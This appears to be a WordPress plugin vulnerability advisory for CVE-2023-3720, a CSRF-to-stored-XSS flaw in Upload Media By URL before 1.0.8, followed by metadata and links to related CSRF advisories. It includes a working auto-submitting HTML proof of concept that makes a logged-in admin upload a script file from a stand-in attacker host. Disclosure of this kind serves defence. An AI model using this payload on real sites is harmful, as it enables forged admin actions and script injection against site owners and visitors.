Upload Media By URL < 1.0.8 – Stored XSS via CSRF | CVE 2023-3720 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files (including HTML containing JS code for users with the unfiltered_html capability) on their behalf.

Proof of Concept

Have a logged in user with the unfiltered_html capability open an HTML file containing the following (this will make them upload the xss.html file):

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/wp-admin/upload.php" method="POST">
      <input type="hidden" name="multiurl" value="https://attacker.com/xss.html" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

upload-media-by-url

Fixed in 1.0.8

References

CVE

URL

https://blog.cleantalk.org/cve-2023-3720-upload-media-by-url-1-0-8-stored-xss-via-csrf/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitriy

Submitter

Dmitriy

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

16375a7f-0a9f-4961-8510-d047ffbf3954

Timeline

Publicly Published

2023-08-02 (about 9 months ago)

Added

2023-08-02 (about 9 months ago)

Last Updated

2023-08-22 (about 8 months ago)

Other

Published

Title

Published

2024-04-29

Title

SVS Pricing Tables <= 1.0.4 - Cross-Site Request Forgery to Pricing Table Deletion

Published

2024-03-28

Title

Ninja Forms Contact Form < 3.8.1 - Publicly Accessible Form Submission Export via CSRF

Published

2017-03-09

Title

CopySafe Web Protection <= 2.5 - Cross-Site Request Forgery (CSRF)

Published

2023-05-24

Title

Download < 2.0.5 - Cross-Site Request Forgery (CSRF)

Published

2022-05-18

Title

Latest Tweets Widget <= 1.1.4 - Arbitrary Settings Update via CSRF